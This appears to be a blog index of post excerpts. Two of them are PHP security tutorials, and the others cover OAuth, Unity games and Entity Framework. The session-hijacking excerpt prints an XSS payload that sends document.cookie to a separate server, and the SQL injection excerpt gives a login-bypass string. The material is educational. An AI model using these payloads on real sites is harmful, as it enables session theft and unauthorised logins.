Posts

Security in PHP web pages - Part 2

In the second part of this series of articles we will explore a forum-style message page to demonstrate a session hijacking attack. First, the page code is as follows: Now the problem: the page input is not checked for potentially dangerous characters, so the page allows the execution of JavaScript. In addition to the small pranks that may be attempted, such as opening popups or redirecting the browser to other pages, the page is vulnerable to another type of attack that captures the session cookie and sends it to another server. This is the kind of attack we are going to demonstrate here. With the following code inserted in the input box for the message, the browser will try to open an image, which is actually a PHP script that will retrieve the session cookie: <script>document.write('<img src="http://localhost:8088/login/submitcookie.php?cookie='+escape(document.cookie)+'"/>');</script> The PHP co...

Security in PHP web pages

One concern every web developer must keep in mind is the security of their products. In this article we start a series of articles which will explore some basic security issues related to injecting SQL statements into web forms or URL parameters. Examples of code with security issues and how to avoid them are presented. So let's start with a simple login form implemented with the following code: In this example, the code checks to see if more than one database record has been returned, thereby assuming that the credentials provided are correct. The biggest mistake is concatenating the values received from the form into the SQL statement, which lets the user manipulate the statement at will. Regardless of the user name entered, simply typing the following text in the password field is enough for the page to indicate that the login has been successfully completed: o' or 1=1 # With this text the SQL statement will always return a rec...

Google OAuth 2.0 in ASPX

In this post I will demonstrate how to use Google OAuth in an ASPX webform with C#. This project uses Visual Studio 2015 and has one option for the user to sign up and another to check the sign-in. Let's start by creating a new project.

PacMan 3D

In this post we will be making a simple and classic game, Pacman, with Unity 3D. Let's create a new project

Entity Framework

This post is about Entity Framework and how to use it to perform, almost with a single mouse click, the CRUD (create, read, update and delete) operations on a table. Let's start by creating a web MVC project with Visual Studio 2015.

Mobile == Optimization

Going mobile is not easy, so you must consider it from the beginning. So I decided to develop a new project for mobile devices and, having a simple structure working, I started looking at the frame rate and, surprise surprise, it looked bad. I mean it was 6 to 8 frames per second and the scene was almost empty. Then I looked at the bag of optimizations and started the kung fu: - first simplify the models, less vertices, less faces, less edges all lead to faster rendering; - change the Unity shaders to mobile; - I'm using a terrain so looking at the options I started messing with this:   - pixel error;   - base map distance;   - detail distance; - There's one directional light in the scene so here's what I changed:   - baking to baked;   - shadows to hard shadows; In the scripts I looked at: - string concatenation - make it with StringBuilder; - function calls, sometimes they can be avoided; - some functions can be optimized like the Mathf.Abs ...

The new project going mobile

New pics of the mobile path for the cars project